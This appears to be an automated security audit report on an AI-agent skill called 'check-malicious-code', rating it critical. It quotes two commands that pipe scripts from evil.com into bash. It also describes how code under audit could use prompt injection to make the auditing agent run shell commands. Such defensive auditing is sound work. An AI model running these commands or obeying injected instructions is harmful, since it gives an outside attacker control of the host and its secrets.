check-malicious-code
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: CRITICAL
REMOTE_CODE_EXECUTION, COMMAND_EXECUTION, EXTERNAL_DOWNLOADS, DATA_EXFILTRATION, PROMPT_INJECTION
Full Analysis
- [REMOTE_CODE_EXECUTION] (CRITICAL): Automated scanning detected 'curl https://evil.com/script.sh | bash' and 'curl https://evil.com/data | bash' within the skill context. These commands execute remote shell scripts without any verification, granting full host access to an external attacker.
- [COMMAND_EXECUTION] (CRITICAL): The skill uses piped shell execution patterns, allowing for arbitrary command delivery from remote servers. This is a severe security violation for any AI agent tool.
- [EXTERNAL_DOWNLOADS] (CRITICAL): The skill attempts to fetch and execute content from 'evil.com', which is an untrusted source not included in the Trusted External Sources list.
- [DATA_EXFILTRATION] (HIGH): The pattern of retrieving data and piping it to a shell interpreter is a common method for exfiltrating system context, credentials, and environment variables during an attack.
- [PROMPT_INJECTION] (HIGH): This tool's primary purpose—auditing other code—creates a massive indirect prompt injection surface. Because it possesses shell execution capabilities, malicious code being audited could exploit the auditor to execute instructions in the host environment.
Recommendations
- CRITICAL: Downloads and executes remote code from untrusted source(s): https://evil.com/data, https://evil.com/script.sh - DO NOT USE
- AI detected serious security threats
Audit Metadata